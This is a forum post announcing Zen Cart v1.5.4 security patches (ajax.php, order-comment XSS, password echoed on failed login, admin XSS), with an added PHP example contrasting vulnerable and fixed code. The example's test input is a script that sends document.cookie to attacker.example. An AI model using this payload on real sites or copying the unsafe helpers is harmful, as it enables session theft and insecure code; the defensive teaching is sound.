  1. #1
    Join Date
    Jan 2004
    Posts
    66,364
    Blog Entries
    7
    Plugin Contributions
    274

    Security Patches for v1.5.4 - November 2015

    While it's never pleasant to report about security problems, today we are announcing a few patches which should be applied to your Zen Cart store.


    1. Problem with /ajax.php in v1.5.4 only - Severity: High
    In Zen Cart v1.5.4 the /ajax.php file has a vulnerability which can be used to cause a server exploit under very specific conditions.
    The patch is simple: replace the /ajax.php file with the one attached below.
    Thanks to High Tech Bridge for reporting the problem.

    QUICK PATCH TO APPLY: /ajax.php


    Below are some additional lower-severity patches affecting prior versions, which should be reviewed carefully for your site, to merge with existing customizations you may have made:

    2. XSS problem for unsanitized comment field - Severity: Medium
    In Zen Cart versions up to and including v1.5.4 an XSS problem exists with the order-comments field.
    XSS problems are where someone can drop in executable/javascript code that can cause problems later when that content is output back to the screen.
    The fix for this is a simple one-line patch to /includes/modules/pages/checkout_confirmation/header_php.php, as shown in this code diff: XSS fix
    Thanks to Trustwave Security for alerting us to this issue.
    The attached checkout_confirmation header_php.php is for v1.3.9-thru-v1.5.4 only. Older versions should be patched manually using the code diff in the link above.
    Patched file: /includes/modules/pages/checkout_confirmation/header_php.php


    3. Failed customer login puts password back in input box - Severity: Low
    When attempting a login with an invalid password, the resulting response contains that invalid password.
    The fix for this is a simple edit to the /includes/functions/html_output.php file, as shown in this code diff: XSS fix
    For v1.5.4 one can apply the attached html_output.php file to /includes/functions/html_output.php ... or if you've customized that file via plugins, use the above code-diff link to find the one line to change.
    Thanks to Trustwave Security for alerting us to this issue.

    Patched file: /includes/functions/html_output.php


    4. XSS concerns on the Admin side - Severity: Low because of working CSRF protections.
    Trustwave Security has reported that some fields on admin edit screens are at risk of XSS exploitation. A patch is being prepared, but it is important to note that none of these concerns can be exploited without having a valid Admin login already. So, the problems could only be caused by persons already having permission to access the admin area and intentionally placing malicious code into the affected fields. The Zen Cart Admin area is already protected against CSRF vulnerabilities so these XSS issues cannot be exploited by third parties.
    A further announcement will be posted when the patch is ready.

    Zen Cart - putting the dream of business ownership within reach of anyone!
    Donate to: DrByte directly or to the Zen Cart team as a whole

    Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
    Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.
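The two storefront fixes in items 2 and 3 above come down to one rule about request data that gets written back into a page: either HTML-encode it on output (the order-comments XSS) or do not write it back at all (the password echoed into the login form). The PHP below is an added illustration of that rule; it is not Zen Cart's code and does not reproduce the attached patches or the linked diffs. The function names, the session/comment handling and the sample inputs are all made up for the example.

```php
<?php
// Added example, not Zen Cart code. Hypothetical helpers that show the
// vulnerable and the fixed behaviour for items 2 and 3 side by side.
declare(strict_types=1);

/**
 * Item 2, vulnerable: the shopper's order comment is concatenated straight
 * into the confirmation page. A comment containing <script>...</script> is
 * executed by the browser of whoever views that page.
 */
function render_comment_unsafe(string $comment): string
{
    return '<div class="comments">' . $comment . '</div>';
}

/**
 * Item 2, fixed: encode on output. ENT_QUOTES also encodes the single quote
 * so the value is safe inside quoted attributes, ENT_SUBSTITUTE replaces
 * invalid byte sequences instead of returning an empty string, and the
 * charset is explicit so multibyte tricks cannot smuggle a '<' past the
 * encoder. Line breaks are converted only after encoding.
 */
function render_comment_safe(string $comment): string
{
    $escaped = htmlspecialchars($comment, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<div class="comments">' . nl2br($escaped) . '</div>';
}

/**
 * Item 3, vulnerable: a generic "redraw the field with what the user typed"
 * helper is also used for the password box. On a failed login the response
 * now carries the submitted password, so it ends up in browser caches,
 * proxy logs and anything that scrapes the page. Note that the value IS
 * HTML-encoded here: encoding stops injection, it does not stop disclosure.
 */
function draw_password_field_unsafe(string $name, array $posted): string
{
    $value = htmlspecialchars($posted[$name] ?? '', ENT_QUOTES, 'UTF-8');
    return '<input type="password" name="' . $name . '" value="' . $value . '" />';
}

/** Item 3, fixed: a password field is never repopulated, whatever was submitted. */
function draw_password_field_safe(string $name): string
{
    return '<input type="password" name="' . $name . '" autocomplete="current-password" />';
}

// Constructed sample input: one hostile order comment and one mistyped login.
$comment = "Leave at side door\n<script>new Image().src='http://attacker.example/?c='+document.cookie</script>";
$posted  = ['email_address' => 'shopper@example.com', 'password' => 'Wr0ng-P@ss'];

$safe = render_comment_safe($comment);
assert(strpos($safe, '<script>') === false);        // tag neutralised...
assert(strpos($safe, '&lt;script&gt;') !== false);  // ...but the text still shows, encoded

assert(strpos(draw_password_field_unsafe('password', $posted), 'Wr0ng-P@ss') !== false); // leaks
assert(strpos(draw_password_field_safe('password'), 'Wr0ng-P@ss') === false);            // does not

echo render_comment_unsafe($comment), "\n", $safe, "\n";
echo draw_password_field_unsafe('password', $posted), "\n", draw_password_field_safe('password'), "\n";
```

Run it with `php -d zend.assertions=1 example.php` so the assertions are evaluated. The point of keeping the encoding in the vulnerable password helper is that it makes no difference there: item 3 is a disclosure bug, not an injection bug, so the only fix is to stop reflecting the value.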

  2. #2

    Re: Security Patches for v1.5.4 - November 2015

    Terribly sorry, there was an error in the first ajax.php file previously attached above.

    It's been updated above, and I'm attaching it again here:

    REVISED AJAX.PHP FILE: /ajax.php
